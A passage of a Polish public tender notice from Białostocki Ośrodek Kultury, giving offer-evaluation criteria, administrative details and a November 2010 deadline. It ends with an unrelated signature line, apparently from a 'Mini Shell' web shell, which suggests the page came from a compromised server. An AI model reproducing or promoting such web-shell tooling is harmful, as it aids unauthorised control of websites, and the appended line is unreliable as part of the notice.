<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>zamawiający wybierze te wnioskiw których wykonawcy wykażą największą liczbę wykonanych zamówien, podobnych do niniejszego zamówienia potwierdzonych referencjami</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.80</li>
<li>2 - ilość zrealizowanych zamówien o podobnym charakterze - 0.20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Białostocki Ośrodek Kultury
ul. Legionowa 5
15-281 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2010 godzina 11:00, miejsce: Białostocki Ośrodek Kultury
ul.Legionowa 5 
15-281 Białystokpokój nr. 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com